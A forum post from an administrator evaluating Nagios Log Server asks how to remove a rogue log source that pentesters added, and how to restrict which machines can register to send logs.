Remove Log Source?
Posted: Fri Jul 10, 2015 11:32 am
Hi, I'm evaluating NLS, running it as a VM and I'm really starting to see the value in using this in our environment. I have a really newb question, though: how do you remove log sources from NLS?
Here's my situation:
We are having a pentest conducted and one of the things they did was add their pentest machine to NLS and start sending commands for remote execution into the logs. It's pretty easy to add any machine to NLS if you know the URL to grab to install the script. I realize I could ask to get access to the machine and change it's rsyslog config, but it is for all intents and purposes a rogue machine. I could also just blacklist the IP and MAC, but then I could possibly be doing that for a lot of IPs if it hops around.
So, it there a way to tell NLS "stop receiving logs from this machine"? And further, is there a way to validate what machines are added to NLS so that something like this doesn't happen for real?
Thank you!
Here's my situation:
We are having a pentest conducted and one of the things they did was add their pentest machine to NLS and start sending commands for remote execution into the logs. It's pretty easy to add any machine to NLS if you know the URL to grab to install the script. I realize I could ask to get access to the machine and change it's rsyslog config, but it is for all intents and purposes a rogue machine. I could also just blacklist the IP and MAC, but then I could possibly be doing that for a lot of IPs if it hops around.
So, it there a way to tell NLS "stop receiving logs from this machine"? And further, is there a way to validate what machines are added to NLS so that something like this doesn't happen for real?
Thank you!